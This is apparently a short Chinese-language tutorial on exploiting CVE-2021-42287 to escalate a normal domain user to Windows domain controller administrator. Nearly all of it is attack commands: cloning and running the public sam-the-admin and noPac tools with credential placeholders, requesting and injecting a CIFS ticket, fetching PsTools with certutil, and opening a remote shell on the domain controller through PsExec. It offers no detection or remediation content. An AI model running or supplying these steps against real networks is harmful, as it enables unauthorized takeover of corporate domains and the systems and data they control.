116181523812186260
前言
CVE-2021-42287漏洞利用,实现Windows域控提权
准备工作
safebuffer/sam-the-admin
下载项目
1 2
| git clone https://github.com/safebuffer/sam-the-admin.git cd sam-the-admin
|
下载依赖
1 2 3
| python3 -m venv venv source venv/bin/activate pip install -r requirements.txt
|
漏洞利用
:域名
:域普通用户用户名
:域普通用户密码
-dc-ip <domain_controller_ip_or_hostname>:指定域控制器IP地址或主机名
1
| python3 sam_the_admin.py <domain_name>/<domain_user_username>:<domain_user_password> -dc-ip <domain_controller_ip_or_hostname> -shell
|
cube0x0/noPac
下载psexec
1 2
| certutil -urlcache -split -f https://download.sysinternals.com/files/PSTools.zip "C:\Program Files\7-Zip\7z.exe" x PSTools.zip -oPSTools
|
下载项目
1 2
| git clone https://github.com/cube0x0/noPac.git cd noPac
|
编译项目
1 2
| msbuild noPac.sln -p:Configuration=Release cd .\bin\Release
|
扫描
1
| .\noPac.exe scan -domain <domain> -user <username> -pass <password>
|
漏洞利用
/dc <domain>:指定域控
/mAccount <username_new>:创建新用户的用户名
/mPassword <username_new>:创建新用户的密码
1
| .\noPac.exe -domain <domain> -user <username> -pass <password> /dc <domain> /mAccount <username_new> /mPassword <password_new> /service cifs /ptt
|
查看凭据
通过PsExec建立连接
<domain>:域控
1
| PSTools\PsExec.exe \\<domain> cmd
|
完成